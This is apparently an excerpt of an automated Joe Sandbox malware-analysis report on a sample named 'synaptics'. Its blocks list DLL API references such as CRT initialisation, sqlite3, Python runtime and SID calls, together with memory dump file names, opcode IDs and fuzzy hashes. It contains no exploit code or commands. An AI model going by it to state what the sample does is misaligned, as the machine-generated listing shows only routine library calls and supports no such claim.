                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0c0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: sqlite3_reset$sqlite3_column_int64sqlite3_step
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3549544539-0
                                                                                                                                                                                                              • Opcode ID: 005692d223d5069b7c73426818bc18479b5185b4e8e3c2d5b2df182de18845ed
                                                                                                                                                                                                              • Instruction ID: b0a0aaf10ceaff4e0d41d0b38a59e1c297a63d868c3b2161fb88be8565d7c071
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 005692d223d5069b7c73426818bc18479b5185b4e8e3c2d5b2df182de18845ed
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C8319371604B809FD730CB69E440696F7E4FB94328F1486ADD89A83E00D773F499C7A2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __RTC_Initialize.LIBCMT ref: 6C0310AE
                                                                                                                                                                                                                • Part of subcall function 6C03154D: InitializeSListHead.KERNEL32(6C034340,6C0310B8,6C033438,00000010,6C031049,?,?,?,6C031271,?,00000001,?,?,00000001,?,6C033480), ref: 6C031552
                                                                                                                                                                                                              • _initterm_e.API-MS-WIN-CRT-RUNTIME-L1-1-0(6C033080,6C033084,6C033438,00000010,6C031049,?,?,?,6C031271,?,00000001,?,?,00000001,?,6C033480), ref: 6C0310C7
                                                                                                                                                                                                              • _initterm.API-MS-WIN-CRT-RUNTIME-L1-1-0(6C033078,6C03307C,6C033438,00000010,6C031049,?,?,?,6C031271,?,00000001,?,?,00000001,?,6C033480), ref: 6C0310E5
                                                                                                                                                                                                              • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6C031118
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3090490537.000000006C031000.00000020.00000001.01000000.0000002A.sdmp, Offset: 6C030000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3090285061.000000006C030000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3090687006.000000006C033000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3090881392.000000006C035000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c030000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image_initterm_initterm_e
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 590286634-0
                                                                                                                                                                                                              • Opcode ID: 40e19c698193529bab861c2cd97f2362cfe1c5539c6b0ed9eef3580acb7e8e72
                                                                                                                                                                                                              • Instruction ID: 36a9ce9a0e73b7c66837c70ca626b45bde0b5c7aa16ca8f47c015ef30ac5deb8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 40e19c698193529bab861c2cd97f2362cfe1c5539c6b0ed9eef3580acb7e8e72
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2F21F332609277AACB205BB488517DC37F19F0E76DF143809C49C2BEC1CF26E149C665
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __RTC_Initialize.LIBCMT ref: 6BFC10AE
                                                                                                                                                                                                                • Part of subcall function 6BFC154D: InitializeSListHead.KERNEL32(6BFC4430,6BFC10B8,6BFC3438,00000010,6BFC1049,?,?,?,6BFC1271,?,00000001,?,?,00000001,?,6BFC3480), ref: 6BFC1552
                                                                                                                                                                                                              • _initterm_e.API-MS-WIN-CRT-RUNTIME-L1-1-0(6BFC308C,6BFC3090,6BFC3438,00000010,6BFC1049,?,?,?,6BFC1271,?,00000001,?,?,00000001,?,6BFC3480), ref: 6BFC10C7
                                                                                                                                                                                                              • _initterm.API-MS-WIN-CRT-RUNTIME-L1-1-0(6BFC3084,6BFC3088,6BFC3438,00000010,6BFC1049,?,?,?,6BFC1271,?,00000001,?,?,00000001,?,6BFC3480), ref: 6BFC10E5
                                                                                                                                                                                                              • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6BFC1118
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3084730871.000000006BFC1000.00000020.00000001.01000000.00000031.sdmp, Offset: 6BFC0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3084621815.000000006BFC0000.00000002.00000001.01000000.00000031.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3084925591.000000006BFC3000.00000002.00000001.01000000.00000031.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3085116642.000000006BFC4000.00000004.00000001.01000000.00000031.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3085224740.000000006BFC5000.00000002.00000001.01000000.00000031.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bfc0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image_initterm_initterm_e
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 590286634-0
                                                                                                                                                                                                              • Opcode ID: 25f6fda5b3288198757f203f5bd60ec0ad0def81cbeeb6e32e381f96cfec3ec9
                                                                                                                                                                                                              • Instruction ID: 1e3a2fd81264d62c70cf9042781aa43e71436d2e792e32a9bba62f23cf62bb5b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 25f6fda5b3288198757f203f5bd60ec0ad0def81cbeeb6e32e381f96cfec3ec9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2721D533588267AADB209BB8841379F77619F1236DF101459D491271F1CB3E83F8C667
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __RTC_Initialize.LIBCMT ref: 6BF4C35D
                                                                                                                                                                                                                • Part of subcall function 6BF4CAB1: InitializeSListHead.KERNEL32(6BF5A678,6BF4C367,6BF53178,00000010,6BF4C2F8,?,?,?,6BF4C520,?,00000001,?,?,00000001,?,6BF531C0), ref: 6BF4CAB6
                                                                                                                                                                                                              • _initterm_e.API-MS-WIN-CRT-RUNTIME-L1-1-0(6BF4E3D8,6BF4E3DC,6BF53178,00000010,6BF4C2F8,?,?,?,6BF4C520,?,00000001,?,?,00000001,?,6BF531C0), ref: 6BF4C376
                                                                                                                                                                                                              • _initterm.API-MS-WIN-CRT-RUNTIME-L1-1-0(6BF4E3B8,6BF4E3D4,6BF53178,00000010,6BF4C2F8,?,?,?,6BF4C520,?,00000001,?,?,00000001,?,6BF531C0), ref: 6BF4C394
                                                                                                                                                                                                              • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6BF4C3C7
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image_initterm_initterm_e
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 590286634-0
                                                                                                                                                                                                              • Opcode ID: 5b49ae5b4b6238df04b55c32666af9c776b9cee60ecdce88a2f234cb71c51662
                                                                                                                                                                                                              • Instruction ID: c58139ed01986e4864f2aa30088070b72b684ace4974e91908a17f995bc66b47
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5b49ae5b4b6238df04b55c32666af9c776b9cee60ecdce88a2f234cb71c51662
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5E212433599203DEDB05ABB8C8067AC3FA09F1236CF1024A5D581271F3DB7E50AC8621
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __RTC_Initialize.LIBCMT ref: 6BF810B4
                                                                                                                                                                                                                • Part of subcall function 6BF81553: InitializeSListHead.KERNEL32(6BF88D20,6BF810BE,6BF87440,00000010,6BF8104F,?,?,?,6BF81277,?,00000001,?,?,00000001,?,6BF87488), ref: 6BF81558
                                                                                                                                                                                                              • _initterm_e.API-MS-WIN-CRT-RUNTIME-L1-1-0(6BF87090,6BF87094,6BF87440,00000010,6BF8104F,?,?,?,6BF81277,?,00000001,?,?,00000001,?,6BF87488), ref: 6BF810CD
                                                                                                                                                                                                              • _initterm.API-MS-WIN-CRT-RUNTIME-L1-1-0(6BF87088,6BF8708C,6BF87440,00000010,6BF8104F,?,?,?,6BF81277,?,00000001,?,?,00000001,?,6BF87488), ref: 6BF810EB
                                                                                                                                                                                                              • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6BF8111E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3082077383.000000006BF81000.00000020.00000001.01000000.00000034.sdmp, Offset: 6BF80000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3081877305.000000006BF80000.00000002.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3082332200.000000006BF87000.00000002.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3082540453.000000006BF88000.00000004.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3082736553.000000006BF89000.00000002.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf80000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image_initterm_initterm_e
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 590286634-0
                                                                                                                                                                                                              • Opcode ID: c08621adf1c4432616af3798bdfd8b710b91f06feda34b32d70b1808d66ebcac
                                                                                                                                                                                                              • Instruction ID: 842deaf3971eb7eec047180cd59795ccce2f3b7470746bb6a6bca79c379f1111
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c08621adf1c4432616af3798bdfd8b710b91f06feda34b32d70b1808d66ebcac
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0A21DE336046229ADF016BB898027DDB775AB1E32DF000399D4B52A1F2DB3E830886A5
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __RTC_Initialize.LIBCMT ref: 6C0510AE
                                                                                                                                                                                                                • Part of subcall function 6C05154D: InitializeSListHead.KERNEL32(6C0553D0,6C0510B8,6C054438,00000010,6C051049,?,?,?,6C051271,?,00000001,?,?,00000001,?,6C054480), ref: 6C051552
                                                                                                                                                                                                              • _initterm_e.API-MS-WIN-CRT-RUNTIME-L1-1-0(6C054088,6C05408C,6C054438,00000010,6C051049,?,?,?,6C051271,?,00000001,?,?,00000001,?,6C054480), ref: 6C0510C7
                                                                                                                                                                                                              • _initterm.API-MS-WIN-CRT-RUNTIME-L1-1-0(6C054080,6C054084,6C054438,00000010,6C051049,?,?,?,6C051271,?,00000001,?,?,00000001,?,6C054480), ref: 6C0510E5
                                                                                                                                                                                                              • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6C051118
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3092314378.000000006C051000.00000020.00000001.01000000.00000028.sdmp, Offset: 6C050000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3092106316.000000006C050000.00000002.00000001.01000000.00000028.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3092520115.000000006C054000.00000002.00000001.01000000.00000028.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3092720561.000000006C055000.00000004.00000001.01000000.00000028.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3092992757.000000006C056000.00000002.00000001.01000000.00000028.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c050000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image_initterm_initterm_e
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 590286634-0
                                                                                                                                                                                                              • Opcode ID: 6edfc1aef23e5221e43f4dd036877dbed2419bc1a80db1fb8612ac1af42b538c
                                                                                                                                                                                                              • Instruction ID: 6883dfa85bacb9005e36f44f011ecd0b72264be050edffdbd53f6d5b2a025d75
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6edfc1aef23e5221e43f4dd036877dbed2419bc1a80db1fb8612ac1af42b538c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2221DE36609205ABCB10AFB49B127D977F19F02B6DFE01445C49927EC1CB72E1B8CA69
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __RTC_Initialize.LIBCMT ref: 6BF310AE
                                                                                                                                                                                                                • Part of subcall function 6BF3154D: InitializeSListHead.KERNEL32(6BF343C8,6BF310B8,6BF33438,00000010,6BF31049,?,?,?,6BF31271,?,00000001,?,?,00000001,?,6BF33480), ref: 6BF31552
                                                                                                                                                                                                              • _initterm_e.API-MS-WIN-CRT-RUNTIME-L1-1-0(6BF33088,6BF3308C,6BF33438,00000010,6BF31049,?,?,?,6BF31271,?,00000001,?,?,00000001,?,6BF33480), ref: 6BF310C7
                                                                                                                                                                                                              • _initterm.API-MS-WIN-CRT-RUNTIME-L1-1-0(6BF33080,6BF33084,6BF33438,00000010,6BF31049,?,?,?,6BF31271,?,00000001,?,?,00000001,?,6BF33480), ref: 6BF310E5
                                                                                                                                                                                                              • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6BF31118
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3079308505.000000006BF31000.00000020.00000001.01000000.00000037.sdmp, Offset: 6BF30000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079115779.000000006BF30000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079418715.000000006BF33000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079607016.000000006BF34000.00000004.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079797292.000000006BF35000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf30000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image_initterm_initterm_e
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 590286634-0
                                                                                                                                                                                                              • Opcode ID: 64abe823c44598d824add58c247d2ee26b01dc1f8a05ef83d1798525accb6f37
                                                                                                                                                                                                              • Instruction ID: b1884d688bf70cdbb692d580a578fe205bf5f24f57e922a364b352fac49a2b76
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 64abe823c44598d824add58c247d2ee26b01dc1f8a05ef83d1798525accb6f37
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5221D273609276AADB20ABB898137DD7771AF0636DF140059D4912B1F1CF3E4354C6E5
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __RTC_Initialize.LIBCMT ref: 6C0AEB5B
                                                                                                                                                                                                                • Part of subcall function 6C0AEFD8: InitializeSListHead.KERNEL32(6C0B6EE8,6C0AEB65,6C0B33C0,00000010,6C0AEAF6,?,?,?,6C0AED1E,?,00000001,?,?,00000001,?,6C0B3408), ref: 6C0AEFDD
                                                                                                                                                                                                              • _initterm_e.API-MS-WIN-CRT-RUNTIME-L1-1-0(6C0B03A0,6C0B03A4,6C0B33C0,00000010,6C0AEAF6,?,?,?,6C0AED1E,?,00000001,?,?,00000001,?,6C0B3408), ref: 6C0AEB74
                                                                                                                                                                                                              • _initterm.API-MS-WIN-CRT-RUNTIME-L1-1-0(6C0B0398,6C0B039C,6C0B33C0,00000010,6C0AEAF6,?,?,?,6C0AED1E,?,00000001,?,?,00000001,?,6C0B3408), ref: 6C0AEB92
                                                                                                                                                                                                              • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6C0AEBC5
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image_initterm_initterm_e
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 590286634-0
                                                                                                                                                                                                              • Opcode ID: 54802e6940a3a668a282f0b9cebf861da5769ee3ca37cfab9acb2097112635f2
                                                                                                                                                                                                              • Instruction ID: 7cbefc06c642985c86d8257c1af9a2adeb1612dc64d2c741c1fbb5551d61ed39
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 54802e6940a3a668a282f0b9cebf861da5769ee3ca37cfab9acb2097112635f2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6921D4322582419BEB049BF4D848BCD37F59F0525CF240425D4B667EC3CB72615BCB99
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(?), ref: 6C0A4B8B
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(?), ref: 6C0A4BA6
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(?), ref: 6C0A4BD2
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(?), ref: 6C0A4BEB
                                                                                                                                                                                                                • Part of subcall function 6C0A3A70: PySequence_Tuple.PYTHON310 ref: 6C0A3A78
                                                                                                                                                                                                                • Part of subcall function 6C0A3A70: PyErr_SetString.PYTHON310(6C7E9584,_argtypes_ must be a sequence of types), ref: 6C0A3A93
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Dealloc$Err_Sequence_StringTuple
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 731907888-0
                                                                                                                                                                                                              • Opcode ID: 5410ac66ef55ce19547853f46a3c3072e3cd405b021923ef225a55ac26f773d1
                                                                                                                                                                                                              • Instruction ID: 2ea205475590ebd4da3e203bd069ac6dc01cdbabe32a2ac094ce965e8da91fd3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5410ac66ef55ce19547853f46a3c3072e3cd405b021923ef225a55ac26f773d1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6B11A5B5B146166BDB048BF9A80079673F8BF4163CB150724EA7997A91DB31F8128E90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _aligned_malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000010), ref: 6BFC1DC3
                                                                                                                                                                                                              • _aligned_free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BFC1E02
                                                                                                                                                                                                              • _aligned_free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BFC1E0F
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6BFC1E17
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3084730871.000000006BFC1000.00000020.00000001.01000000.00000031.sdmp, Offset: 6BFC0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3084621815.000000006BFC0000.00000002.00000001.01000000.00000031.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3084925591.000000006BFC3000.00000002.00000001.01000000.00000031.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3085116642.000000006BFC4000.00000004.00000001.01000000.00000031.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3085224740.000000006BFC5000.00000002.00000001.01000000.00000031.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bfc0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _aligned_free$_aligned_mallocfree
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1818527941-0
                                                                                                                                                                                                              • Opcode ID: 01e579405103495b49740352506dd3f18e716ae3f7f9510ec815c253142b0dd1
                                                                                                                                                                                                              • Instruction ID: e9585c79af5254bea1282fbcb3b69b0a2d63030c544d79bde16a22930d01a771
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 01e579405103495b49740352506dd3f18e716ae3f7f9510ec815c253142b0dd1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BD012B73B4011257DB008F25EC41A97B764FF00666B000531EC05D7220D73AFAB8D7E2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6BF43FBC
                                                                                                                                                                                                              • memset.VCRUNTIME140(00000000,00000000), ref: 6BF43FC9
                                                                                                                                                                                                              • memset.VCRUNTIME140(?,00000000,000000DC,00000000,00000000), ref: 6BF43FF4
                                                                                                                                                                                                              • _Py_NewReference.PYTHON310(?,?,00000000,000000DC,00000000,00000000), ref: 6BF44006
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memset$Referencemalloc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3353409452-0
                                                                                                                                                                                                              • Opcode ID: eb32f6aa6b5972dda3c817e2aa886e355c356ab78b644c6d219e06dd729cf757
                                                                                                                                                                                                              • Instruction ID: 0938432ab0f00312364f110a309b9baa1397987c5d637f4119bf638b2c7f5174
                                                                                                                                                                                                              • Opcode Fuzzy Hash: eb32f6aa6b5972dda3c817e2aa886e355c356ab78b644c6d219e06dd729cf757
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 63018B726212109BDB148F59D8C4E57BBA8FF15750F0980A6EA089F327E766C800C7B9
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _Py_NewReference.PYTHON310(00000000,0000000C,?,00000000,00000000,6BF434DC,?), ref: 6BF4789E
                                                                                                                                                                                                              • GetLengthSid.ADVAPI32(?), ref: 6BF478A8
                                                                                                                                                                                                              • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6BF478B1
                                                                                                                                                                                                              • CopySid.ADVAPI32(00000000,00000000,?), ref: 6BF478C0
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CopyLengthReferencemalloc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3624451276-0
                                                                                                                                                                                                              • Opcode ID: 2cef4262b36b2dd5b9d682c3543f5f45af0e233f8bdef55f8f17b9475b9a929f
                                                                                                                                                                                                              • Instruction ID: fad58df7ad9205c9c8cb18e870c8102b150af459192cbfc53c7a5748002fd917
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2cef4262b36b2dd5b9d682c3543f5f45af0e233f8bdef55f8f17b9475b9a929f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3DF05BF16202109FE704EF59DC88E66BB7CEFA6256B044029F505C2227D730D818C6B2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(000000DC), ref: 6BF43F41
                                                                                                                                                                                                              • memset.VCRUNTIME140(00000000,00000000,000000DC), ref: 6BF43F52
                                                                                                                                                                                                              • memset.VCRUNTIME140(?,00000000,000000DC,00000000,00000000,000000DC), ref: 6BF43F76
                                                                                                                                                                                                              • _Py_NewReference.PYTHON310(?,?,00000000,000000DC,00000000,00000000,000000DC), ref: 6BF43F84
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memset$Referencemalloc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3353409452-0
                                                                                                                                                                                                              • Opcode ID: d1574b4a7a0ed7ce6a8e7321f673582de58b6e336fdd0e7c480e3d0d5b42eaa1
                                                                                                                                                                                                              • Instruction ID: 9cc8fedd8c5ec458a5fbcc264c22b3a87f3107425cfa0159dc427dc7bb87c51e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d1574b4a7a0ed7ce6a8e7321f673582de58b6e336fdd0e7c480e3d0d5b42eaa1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8FF0B4712607119FE3209BA5C885F5377A8EF49750F00445AE349D7662D7B5E8008765
                                                                                                                                                                                                              APIs
